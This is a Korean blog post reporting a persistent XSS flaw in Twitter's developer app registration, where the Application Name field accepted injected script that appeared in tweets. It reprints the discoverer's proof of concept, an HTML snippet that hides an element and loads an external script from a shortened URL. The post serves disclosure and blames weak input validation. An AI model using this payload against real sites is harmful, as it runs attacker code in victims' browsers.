Twitter.com XSS 취약점 공개

Twitter 의 XSS 취약점이 인도네시아 해커 H4x0r-x0x 에 의해 발견되었습니다.
해당 취약점은 예전에 생각해보았던 취약점이었는데, 테스트 해보지 않았던게 아쉽네요. :(
어찌되었던 그동안 XSS와 CSRF 취약점에 한참 시달려오던 Twitter 은 이번에도 예외없이 보안문제로 질타를 받게될 것 같습니다.

문제는 이렇습니다.

<그림 1> Script 가 실행 가능한 구역인 Application Name 필드

바로 저 곳에서 XSS 취약점이 발생한다는 것인데, web에서 작성한 트윗이니 web으로 찍히겠지요. 저기에 직접 스크립트를 삽입하기 위해서는 Application 등록을 해야하는데, 트위터의 개발자 센터의 새 어플리케이션 등록 [ http://dev.twitter.com/apps/new ] 에서 Application Name 을 기입할 때 XSS 코드의 Injection 이 가능합니다.

<그림 2> 어플리케이션 등록 화면. Application Name 에서 Code Injection 이 가능하다.

취약점을 발표한 H4x0r 은 다음과 같은 PoC를 공개했습니다.

<span>via <a href="http://www.0wn3d-5ys.co.cc" rel="nofollow">Ub­­&shy;erTw­i­&shy;tter<span
style="visibility: hidden"&gt; <script src='http://is.gd/cWO66' type='text/javascript'&gt;</script&gt;</a>
</span>

 

스크립트 삽입이 가능해지면서 공격자의 Party 는 열리게 됩니다. :)

결론적으로, 이번 XSS 취약점은 대부분의 경우가 그렇지만,
"사용자 입력 검증 루틴이 부실했기 때문이다" 라고 이야기할 수 있겠습니다.

보다 자세한 정보는 아래의 링크를 참고해주세요.
[ http://praetorianprefect.com/archives/2010/06/persistent-xss-on-twitter-com/ ]